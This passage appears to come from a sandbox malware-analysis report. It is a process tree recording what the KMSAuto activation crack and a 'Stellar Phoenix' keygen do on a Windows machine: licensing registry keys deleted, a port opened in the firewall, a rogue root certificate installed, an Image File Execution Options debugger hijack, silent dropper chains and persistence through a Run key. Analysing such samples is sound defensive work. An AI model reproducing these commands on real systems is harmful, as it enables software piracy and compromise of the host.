C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:904

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:1472

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:3808

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2900

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3864

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:3236

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:788

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3812

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3372

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:1160

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:2036

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:720

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:880

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2992

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:2212

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:1472

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:3524

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2900

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2784

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2180

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3844

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2484

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3460

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:4016

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2252

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:1172

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:1000

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:2680

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:1472

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2780

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2900

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:3728

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3532

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3152

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:412

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:3564

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3468

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:3984

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:1468

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:1784

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:184

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:992

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:3808

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:3684

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3608

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3132

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:1192

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:1436

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
2⤵
PID:3544

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:4036

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2372

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2780

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
2⤵
PID:2992

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
2⤵
- Modifies data under HKEY_USERS
PID:3808

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
2⤵
PID:3988

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2028

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
2⤵
PID:3680

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:768

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
2⤵
PID:3816

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
2⤵
PID:3984

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:472

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3536

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:576

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3864

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop KMSEmulator
2⤵
PID:2900

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete KMSEmulator
2⤵
PID:2080

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
2⤵
PID:2028

C:\Windows\system32\reg.exe
reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
3⤵
- Modifies registry key
PID:1640

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:2152

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q
2⤵
PID:3012

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"
2⤵
PID:1260

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto
2⤵
PID:3924

C:\ProgramData\KMSAuto\wzt.dat
wzt.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3160

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"
2⤵
PID:4060

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
2⤵
PID:3928

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3176

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
2⤵
PID:8

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3884

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto
2⤵
PID:1220

C:\ProgramData\KMSAuto\bin.dat
bin.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2028

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q
2⤵
PID:3944

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"
2⤵
PID:896

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe
2⤵
PID:768

C:\ProgramData\KMSAuto\bin\AESDecoder.exe
AESDecoder.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:904

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"
2⤵
PID:1464

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1000

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1444

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:4060

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f
2⤵
PID:3808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "
3⤵
PID:1312

C:\Windows\system32\NETSTAT.EXE
netstat -ano
4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\system32\find.exe
find ":1688 "
4⤵
PID:3988

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:788

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=1688
2⤵
PID:1264

C:\Windows\SysWOW64\sc.exe
"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto
2⤵
PID:896

C:\Windows\SysWOW64\sc.exe
"sc.exe" start KMSEmulator
2⤵
PID:3816

C:\Windows\SysWOW64\net.exe
net stop sppsvc /y
2⤵
PID:424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sppsvc /y
3⤵
PID:804

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe
2⤵
PID:184

C:\Windows\System32\taskkill.exe
taskkill /t /f /IM SppExtComObj.Exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c SppPatcher_x64.dat -y -pkmsauto
2⤵
PID:3320

C:\Users\Admin\AppData\Local\Temp\SppPatcher_x64.dat
SppPatcher_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2184

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "SppPatcher_x64.dat"
2⤵
PID:1648

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjPatcher.exe C:\Windows\System32\SppExtComObjPatcher.exe /Y
2⤵
- Drops file in System32 directory
PID:1308

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjHook.dll C:\Windows\System32\SppExtComObjHook.dll /Y
2⤵
- Drops file in System32 directory
PID:1640

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "Debugger" /t REG_SZ /d "SppExtComObjPatcher.exe"
2⤵
PID:3544

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "KMS_Emulation" /t REG_DWORD /d 0
2⤵
PID:2388

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
2⤵
PID:3296

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:1772

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
2⤵
PID:2968

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
2⤵
PID:3000

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
2⤵
- Modifies data under HKEY_USERS
PID:4016

C:\Windows\System32\reg.exe
C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
2⤵
PID:2852

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe
2⤵
PID:3408

C:\Windows\system32\taskkill.exe
taskkill /t /f /IM SppExtComObj.Exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\Users\Admin\AppData\Local\Temp\KMSAuto" /S /Q
2⤵
PID:60

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjPatcher.exe"
2⤵
PID:3028

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjHook.dll"
2⤵
PID:3320

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop KMSEmulator
2⤵
PID:1216

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete KMSEmulator
2⤵
PID:3696

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
2⤵
PID:1616

C:\Windows\system32\reg.exe
reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
3⤵
- Modifies registry key
PID:4016

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:1308

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q
2⤵
PID:2536

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "kmsauto.ini"
2⤵
PID:4040

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3f0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\ProgramData\KMSAuto\bin\KMSSS.exe
"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP
1⤵
- Executes dropped EXE
PID:740

C:\ProgramData\KMSAuto\bin\KMSSS.exe
"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP
1⤵
- Executes dropped EXE
PID:720

C:\Windows\system32\SppExtComObjPatcher.exe
SppExtComObjPatcher.exe C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2780

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:2212

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=379cccfb-d4e0-48fe-b0f2-0136097be147;Action=CleanupState;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;Trigger=TimerEvent
3⤵
PID:3728

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:184

C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"
1⤵
- Executes dropped EXE
PID:2968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
2⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:3828

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"
4⤵
- Executes dropped EXE
PID:4344

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:4396

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:1320

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:496

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
4⤵
PID:4380

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4440

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:644

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
4⤵
- Executes dropped EXE
PID:4352

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
5⤵
PID:4588

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:4664

C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4616

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4716

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4756

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe"
4⤵
- Executes dropped EXE
PID:5044

C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4140

C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe" 1 3.1615300310.604786d6aa2e6 101
6⤵
- Adds Run key to start application
PID:4232

C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe" 2 3.1615300310.604786d6aa2e6
7⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4304

C:\Users\Admin\AppData\Local\Temp\dhfyxcdte55\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\dhfyxcdte55\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\is-5UQGA.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5UQGA.tmp\Setup3310.tmp" /SL5="$403FE,802346,56832,C:\Users\Admin\AppData\Local\Temp\dhfyxcdte55\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\is-LLKSQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-LLKSQ.tmp\Setup.exe" /Verysilent
10⤵
PID:6596

C:\Users\Admin\AppData\Local\Temp\is-IP0FU.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IP0FU.tmp\Setup.tmp" /SL5="$3047A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-LLKSQ.tmp\Setup.exe" /Verysilent
11⤵
PID:6648

C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:7684

C:\Users\Admin\AppData\Local\Temp\is-JFUDC.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JFUDC.tmp\PictureLAb.tmp" /SL5="$207E2,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:7728

C:\Users\Admin\AppData\Local\Temp\is-U1GG7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-U1GG7.tmp\Setup.exe" /VERYSILENT
14⤵
PID:5536

C:\Users\Admin\AppData\Local\Temp\is-9F7C4.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9F7C4.tmp\Setup.tmp" /SL5="$206C8,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-U1GG7.tmp\Setup.exe" /VERYSILENT
15⤵
PID:7480

C:\Users\Admin\AppData\Local\Temp\is-PN4OB.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-PN4OB.tmp\def.exe" /S /UID=lab214
16⤵
PID:7472

C:\Users\Admin\AppData\Local\Temp\38-bd5ef-f24-4499f-c975bfce88e02\Socekyqusa.exe
"C:\Users\Admin\AppData\Local\Temp\38-bd5ef-f24-4499f-c975bfce88e02\Socekyqusa.exe"
17⤵
PID:5688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0y4rhd2k.c3n\customer4.exe & exit
18⤵
PID:8228

C:\Users\Admin\AppData\Local\Temp\0y4rhd2k.c3n\customer4.exe
C:\Users\Admin\AppData\Local\Temp\0y4rhd2k.c3n\customer4.exe
19⤵
PID:8948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1o3lkkfn.2ou\askinstall18.exe & exit
18⤵
PID:8496

C:\Users\Admin\AppData\Local\Temp\1o3lkkfn.2ou\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\1o3lkkfn.2ou\askinstall18.exe
19⤵
PID:9168

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
20⤵
PID:9048

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
21⤵
- Kills process with taskkill
PID:7348

C:\Windows\System32\cmd.exe
